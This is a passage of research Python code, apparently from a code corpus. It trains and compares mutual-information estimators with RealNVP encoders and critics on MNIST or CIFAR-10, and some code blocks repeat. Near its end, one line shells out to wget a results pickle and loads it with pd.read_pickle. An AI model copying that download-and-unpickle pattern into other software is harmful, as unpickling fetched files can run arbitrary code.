__init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return 
reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. 
By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! 
Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\ndef run_all_experiments():\n tf.compat.v1.reset_default_graph()\n wpc_loss = lambda x: -infonce_lower_bound(x)\n cpc_loss = lambda x: -infonce_lower_bound(x)\n drfc_loss = lambda x: -our_lower_bound(x)\n pcc_loss = lambda x: -js_fgan_lower_bound(x)\n skew_pcc_loss = lambda x: -skew_js_fgan_lower_bound(x)\n ls_pcc_loss = lambda x: -label_smooth_pcc(x)\n pre_ls_pcc_loss = lambda x: -predict_smooth_pcc(x)\n adap_pred_smooth_pcc_loss = lambda x: -adap_pred_smooth_pcc(x)\n adap_label_smooth_pcc_loss = lambda x: -adap_label_smooth_pcc(x)\n loss_fcts = {'pcc': pcc_loss, 'cpc': cpc_loss, 'ls_pcc': ls_pcc_loss,\n 'prels_pcc': pre_ls_pcc_loss, 'adap_pred_pcc':\n adap_pred_smooth_pcc_loss, 'adap_label_pcc': adap_label_smooth_pcc_loss\n }\n kwargs = dict(shift_only=True, activation=lambda x: tf.nn.relu(x),\n kernel_initializer=tf.compat.v1.initializers.truncated_normal(\n stddev=0.0001), bias_initializer='zeros')\n nets = {'realnvp': lambda : (RealNVPBijector(DIMS // 2, n_couplings=30,\n hidden_layers=[512, 512], dense_kwargs=kwargs), RealNVPBijector(\n DIMS // 2, n_couplings=30, hidden_layers=[512, 512], dense_kwargs=\n kwargs))}\n critics = {'bilinear': lambda : BilinearCritic(feature_dim=DIMS // 2)}\n return run_sweep(nets, critics, loss_fcts, 'invertible', n_iters=21000,\n n_evals=21)\n\n\nif RUN_EXPERIMENTS:\n data_invertible = run_all_experiments()['df']\n data_invertible.to_pickle(RESULT_DIR)\nelse:\n os.system(\n 'wget -q -N https://storage.googleapis.com/mi_for_rl_files/mi_results.pkl'\n )\n data_invertible = pd.read_pickle('mi_results.pkl')\n data_invertible = data_invertible[data_invertible.exp_name == 'invertible']\n",
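The least self-explanatory pieces of this entry are the adaptive smoothing functions `acti_func` and `adap_pred_smooth_pcc`. The following NumPy sketch restates them outside the TensorFlow graph; the `_np` names and the random critic matrix are assumptions for illustration, while the constants follow the entry itself (a, b, c = 0.005, 0.1, 0.9). The piecewise schedule returns a smoothing weight of up to `a` for predicted probabilities near 0 or 1 and zero on the confident band (b, c); the prediction is then shrunk toward 0.5 by that weight before the binary cross-entropy against the identity labels is negated.

# Illustrative sketch only; not part of the corpus entries above or below.
import numpy as np

a, b, c = 0.005, 0.1, 0.9

def acti_func_np(x, a, b, c):
    # Piecewise smoothing weight: linear ramps on [0, b] and [c, 1], zero in between.
    alpha = np.zeros_like(x)
    alpha = np.where(x <= b, -a * x / b + a, alpha)
    alpha = np.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)
    return alpha

def adap_pred_smooth_pcc_np(f):
    # f: [n, n] critic matrix; diagonal entries are the positive pairs.
    n = f.shape[0]
    labels = np.eye(n).reshape(-1)
    p = 1.0 / (1.0 + np.exp(-f)).reshape(-1)   # sigmoid of the critic scores
    alpha = acti_func_np(p, a, b, c)
    p = (1.0 - alpha) * p + alpha / 2          # shrink predictions toward 0.5
    eps = 1e-7                                 # guard against log(0)
    bce = -np.mean(labels * np.log(p + eps) + (1 - labels) * np.log(1 - p + eps))
    return -bce                                # the estimator is the negated BCE

rng = np.random.default_rng(0)
f = rng.normal(size=(100, 100))                # hypothetical critic matrix
print(adap_pred_smooth_pcc_np(f))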
"<import token>\nparser = argparse.ArgumentParser(description=\n 'Representation Learning Experiments')\nparser.add_argument('--dataset', default='mnist', type=str, help=\n 'cifar10 or mnist')\nparser.add_argument('--lr', default=0.0001, type=float, help='learning rate')\nparser.add_argument('--batch_size', default=100, type=int, help=\n 'mini batch size')\nparser.add_argument('--smoothing', default=0.01, type=float, help=\n 'label smoothing parameter')\nparser.add_argument('--output_dir', type=str, default='./runs', help=\n 'directory where the results will be stored')\nargs = parser.parse_args()\na, b, c = 0.005, 0.1, 0.9\nif not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\nTFDS_NAME = args.dataset\nNRUNS = 10\nif TFDS_NAME == 'mnist':\n DIMS = 784\nelif TFDS_NAME == 'cifar10':\n DIMS = 3072\nLEARNING_RATE = args.lr\nN_CLASSES = 10\nTRAIN_BATCH_SIZE = args.batch_size\nRESULT_DIR = './runs/{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS,\n LEARNING_RATE, TRAIN_BATCH_SIZE)\nRUN_EXPERIMENTS = True\nFEATURE_INPUT = 'image'\nFEATURE_LABEL = 'label'\ntfb = tfp.bijectors\ntfd = tfp.distributions\ntfkl = tf.keras.layers\ntf.keras.backend.clear_session()\nResultsConfig = collections.namedtuple('ResultsConfig', ['nets', 'critic',\n 'loss'])\nResults = collections.namedtuple('Results', ['iterations',\n 'training_losses', 'testing_losses', 'classification_accuracies',\n 'singular_values'])\nResultsAdversarial = collections.namedtuple('ResultsAdversarial', [\n 'losses_e', 'losses_c', 'classification_accuracies', 'iters'])\nResultsSamplingIssues = collections.namedtuple('ResultsSamplingIssues', [\n 'mi_true', 'nce_estimates_noniid', 'nce_estimates_iid',\n 'nwj_estimates_noniid', 'nwj_estimates_iid'])\n\n\ndef acti_func(x, a, b, c):\n x = tf.stop_gradient(x)\n alpha = tf.zeros_like(x)\n alpha = tf.where(x <= b, -a * x / b + a, alpha)\n alpha = tf.where((x > b) & (x < c), 0.0, alpha)\n alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)\n return alpha\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * 
session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\ndef map_data(x_array, session, codes, data_ph, dims, batch_size=512):\n x_mapped = []\n for i in range(0, x_array.shape[0], batch_size):\n x_mapped.append(session.run(codes, feed_dict={data_ph: x_array[i:i +\n batch_size, :dims]}))\n return np.concatenate(x_mapped, axis=0)\n\n\ndef reduce_logmeanexp_nodiag(x, axis=None):\n batch_size = x.shape[0]\n logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(\n np.inf * tf.ones(batch_size)), axis=axis)\n if axis:\n num_elem = batch_size - 1.0\n else:\n num_elem = batch_size * (batch_size - 1.0)\n return logsumexp - tf.math.log(num_elem)\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\ndef nwj_lower_bound(scores):\n return tuba_lower_bound(scores - 1.0)\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\[email protected]\ndef infonce_lower_bound(scores):\n \"\"\"InfoNCE lower bound from van den Oord et al. 
(2018).\"\"\"\n nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.\n reduce_logsumexp(input_tensor=scores, axis=1))\n mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll\n return mi\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\[email protected]\ndef skew_js_fgan_lower_bound(f):\n \"\"\"skewed js lower bound (true cross entropy)\"\"\"\n n = tf.cast(f.shape[0], tf.float32)\n alpha = 1 / n\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return alpha * first_term - (1 - alpha) * second_term\n\n\[email protected]\ndef label_smooth_pcc(f):\n \"\"\" pcc with label smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n labels = (1.0 - args.smoothing) * labels + args.smoothing / 2\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef predict_smooth_pcc(f):\n \"\"\" pcc with predictor smoothing trick\"\"\"\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\[email protected]\ndef adap_label_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n new_labels = (1.0 - alpha) * labels + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(new_labels, pre_prob)\n\n\[email protected]\ndef adap_pred_smooth_pcc(f):\n n = f.shape[0]\n labels = tf.eye(n)\n labels = tf.reshape(labels, [-1, 1])\n pre_prob = tf.reshape(tf.sigmoid(f), [-1, 1])\n alpha = acti_func(pre_prob, a, b, c)\n pre_prob = (1.0 - alpha) * pre_prob + alpha / 2\n bce = tf.keras.losses.BinaryCrossentropy()\n return -bce(labels, pre_prob)\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\ntf.compat.v1.reset_default_graph()\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\ndef load_data(split):\n return tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split\n ).cache().map(map_func=map_fn).shuffle(1000)\n\n\ndef tfds_to_np(dataset):\n features = list(tfds.as_numpy(dataset))\n images = np.stack([f[FEATURE_INPUT].ravel() for f in features])\n labels = 
np.stack([f[FEATURE_LABEL].ravel() for f in features])\n return images, labels\n\n\ndataset_train = load_data('train')\ndataset_test = load_data('test')\nx_train, y_train = tfds_to_np(dataset_train)\nx_test, y_test = tfds_to_np(dataset_test)\ntf.compat.v1.reset_default_graph()\nx_train_noisy = x_train + 0.05 * np.random.randn(*x_train.shape)\nx_test_noisy = x_test + 0.05 * np.random.randn(*x_test.shape)\nprint('Fit on half the pixels: {}. It should be around 0.835.'.format(\n logistic_fit(x_train_noisy[:, :DIMS // 2], y_train, x_test_noisy[:, :\n DIMS // 2], y_test)))\n\n\ndef processed_train_data(dims, batch_size):\n dataset = load_data('train')\n dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)\n get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched\n ).get_next()\n features = get_next[FEATURE_INPUT]\n labels = get_next[FEATURE_LABEL]\n x_1, x_2 = tf.split(features, [dims, DIMS - dims], axis=-1)\n return x_1, x_2, labels\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative 
integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\ndef real_nvp_default_template(hidden_layers, shift_only=False, activation=\n tf.nn.relu, name=None, *args, **kwargs):\n with tf.compat.v1.name_scope(name or 'real_nvp_default_template'):\n\n def _fn(x, output_units, **condition_kwargs):\n \"\"\"Fully connected MLP parameterized via `real_nvp_template`.\"\"\"\n if condition_kwargs:\n raise NotImplementedError(\n 'Conditioning not implemented in the default template.')\n if tensorshape_util.rank(x.shape) == 1:\n x = x[tf.newaxis, ...]\n reshape_output = lambda x: x[0]\n else:\n reshape_output = lambda x: x\n for units in hidden_layers:\n x = tf1.layers.dense(*args, inputs=x, units=units,\n activation=activation, **kwargs)\n x = tf1.layers.dense(*args, inputs=x, units=(1 if shift_only else\n 2) * output_units, activation=None, **kwargs)\n if shift_only:\n return reshape_output(x), None\n shift, log_scale = tf.split(x, 2, axis=-1)\n return reshape_output(shift), 1e-07 + tf.nn.softplus(reshape_output\n (log_scale))\n return tf1.make_template('real_nvp_default_template', _fn)\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, 
